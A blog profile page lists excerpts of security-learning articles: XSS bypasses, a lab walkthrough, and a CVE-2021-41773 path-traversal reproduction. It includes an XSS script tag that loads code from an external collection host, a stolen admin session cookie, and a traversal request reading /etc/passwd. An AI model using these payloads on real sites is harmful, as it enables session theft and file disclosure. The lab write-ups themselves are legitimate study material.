自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(9)
  • 资源 (1)
  • 收藏
  • 关注

原创 XSS绕过方法

script>被转码,使用其他事件方法。(level7答案)

2024-03-28 12:43:55 103

原创 Centos 7中部署Kubernetes

3.关闭防火墙及SELinux、清空IP tables及禁用Swap交换分区在3台虚拟机都分别操作。将k8s配置复制到2台node,并开启路由转发。2.Master机器产生报错,后续采用脚本安装。二、配置SSH免密登录、主机名解析及yum源。3.安装成功后,使用下面命令将节点加入集群。一、准备工作:部署Docker及配置。1.配置yum源安装docker。配置域名解析,分别保存到三台主机。2.配置docker的镜像加速。1.安装部署k8s相关工具。配置k8s的yum阿里源。

2023-10-06 08:35:31 110 1

原创 Centos7搭建LNMP

在html目录写入一个phpinfo(),info.php 后续改名为index.php并添加到配置文件中。未设置主页时,在地址中访问info.php,则浏览器无法解析而造成文件下载。安装编译环境(yum源是aliyun的,可自行百度更换,此处不赘述)nginx本身无法对php进行解析,安装php-fpm。将BOOTPROTO改为dhcp即可,然后重启网卡。给nginx启动进程一个身份,创建nginx用户。修改nginx配置文件,添加主页。查看帮助 ./nginx。配置完成后进行编译安装。

2023-09-24 15:10:47 104 1

原创 MSF-win2003-getshell

许久未用的服务器忘记密码,尝试几次无果后,决定自己打进去看看。

2023-09-17 14:38:07 115 1

原创 CTF_平台练习

把index.php用base64编码两次、hex编码一次,输入到url参数中,即可查看本题源码,进行分析。因为在源码中可以看到过滤了flag所以需要使用f*来查看。目录穿越去访问根目录下的flag。同时传递参数的位置是通过get方式传递pop的参数值。此处交由chatgpt进行分析,以下是他的回答。发现应该不是当前目录下的flag.php文件。很简单,直接上蚁剑,在根目录下查看flag。滑到页面底部找到flag。尝试sqlmap跑一手。linux系统,尝试。根据用户名提示登录网页。读取flag.php。

2023-09-17 14:32:19 201 1

原创 python计算MD5值

在CMD打开python输入>>> import hashlib计算“123456”的值>>> hashlib.md5("123456")赋值给s>>> s = hashlib.md5("123456".encode())最后输出16进制数>>> s.hexdigest()'e10adc3949ba59abbe56e057f20f883e'...

2021-10-24 14:13:54 257

原创 Hack Me Please靶机攻略

hack me please靶机攻略首先进行主机发现信息收集扫描开放的端口nmap -p- -sS -O -sV -sC -A -T4 192.168.237.197 -oN nmap.A访问80端口,首页无可用信息F12查看源码,找到main.js文件main.js是整个项目的入口文件,尝试访问main.js,查看源码发现是一个seeddms的管理系统,查看seeddms对应5.1.22版本的源码seeddms / Code / ...

2021-10-20 19:02:47 613

原创 XSS与CSRF原理解析

一、固定会话攻击1.XSS平台练习创建一个项目复制代码内容<sCRiPt sRC=//xsshs.cn/Ljwy></sCrIpT>在CMS的留言板中插入JS代码,点击提交。管理员登录网站后台查看项目获取的cookiecookie:username=admin; userid=1; PHPSESSID=5m3m8uapqrgvhi678mf5uhmgh0执行代码成功登录后台2.XSS原理图描述1)

2021-10-19 20:57:08 37

原创 CVE-2021-41773目录遍历(文件穿越)漏洞复现

CVE-202141773目录遍历(文件穿越)漏洞Linux环境下进入CVE-202141773漏洞环境文件夹,执行docker-compose up -d启动漏洞环境。等待文件下载……安装完成后重启服务访问本地的8080端口打开Burpsuite,构造get参数GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1转换为post参数修改命令为POST /cgi-bin/.%2e/%2e

2021-10-11 22:09:07 1700

hack me please靶机攻略.docx

hack me please靶机攻略.docx

2021-10-19

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除